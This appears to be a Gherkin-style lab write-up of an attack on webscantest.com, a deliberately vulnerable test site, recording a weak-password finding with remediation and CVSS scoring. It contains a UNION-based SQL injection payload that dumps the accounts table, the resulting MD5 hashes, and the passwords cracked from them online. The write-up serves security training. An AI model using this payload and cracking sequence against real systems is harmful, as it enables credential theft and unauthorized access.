## Version 1.4.1
## language: en

Feature:
  TOE:
    web-scanner-test-site
  Category:
    Information Gathering
  Location:
    http://webscantest.com/
  CWE:
    CWE-521: Weak Password Requirements
  Rule:
    REQ.133 Passwords with at least 20 characters
  Goal:
    Get user passwords
  Recommendation:
    Modify the policy and set password length and complexity

  Background:
  Hacker's software:
    |<software name>       | <version>      |
    | Kali Linux           | 2018.3         |
    | Mozilla firefox      | 74.0 (64-bit)  |
    | Burpsuite            | 2.1.04         |
  TOE information:
    Given I am accessing the site http://www.webscantest.com/
    Then I can see there is a web page with challenges

  Scenario: Normal use case:
    Given I access http://www.webscantest.com/
    And I select a challenge
    Then I can try to hack it

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection:
    Given I access http://www.webscantest.com/
    And I see the footer with a set of credentials
    """
    The form based credentials are testuser/testpass,
    and the HTTP Basic credentials are btestuser/btestpass.
    """
    Then I know that the passwords are weak

  Scenario: Exploitation
    Given I have access to the vulnerability 0089-sql-injection
    And I use the following payload
    """
    ?id=1 union select 1,uname,passwd,4 from accounts
    """
    Then I get users and passwords
    """
    1 admin 21232f297a57a5a743894a0e4a801fc3 $4
    1 testuser 179ad45c6ce2cb97cf1029e212046e81 $4
    """
    When I go to the webpage
    """
    https://crackstation.net/
    """
    And put there the hashes
    Then I get clear text passwords
    """
    Hash Type Result
    179ad45c6ce2cb97cf1029e212046e81 md5 testpass
    21232f297a57a5a743894a0e4a801fc3 md5 admin
    """
    And I can access as one of them

  Scenario: Remediation
    Modify the policy and set password length and complexity

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    5.3/10 (Medium) - AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    5.3/10 (Medium) - E:H/RL:U/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    6.1/10 (Medium) - CR:H/IR:H/AR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:U/MC:L/MI:N/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2020-04-17
